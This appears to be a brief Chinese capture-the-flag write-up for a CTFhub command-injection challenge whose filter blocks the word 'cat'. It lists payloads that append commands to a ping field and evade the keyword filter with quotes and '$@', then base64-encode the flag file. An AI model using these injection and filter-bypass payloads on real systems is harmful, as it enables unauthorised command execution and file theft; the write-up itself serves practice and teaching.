CTFhub-RCE-过滤cat

查看当前目录:输入:127.0.0.1|ls

CTFhub-RCE-过滤cat_第1张图片

 127.0.0.1|cat  flag_42211411527984.php  无输出内容

CTFhub-RCE-过滤cat_第2张图片

使用单引号绕过  127.0.0.1|c''at flag_42211411527984.php|base 64

使用双引号绕过  127.0.0.1|c""at flag_42211411527984.php|base64

使用特殊变量绕过  127.0.0.1|c$@at flag_42211411527984.php|base64

(base64 之间不要有空格)

CTFhub-RCE-过滤cat_第3张图片

 base64 解密

CTFhub-RCE-过滤cat_第4张图片

 

你可能感兴趣的:(CTFhub-RCE,网络安全,php,安全)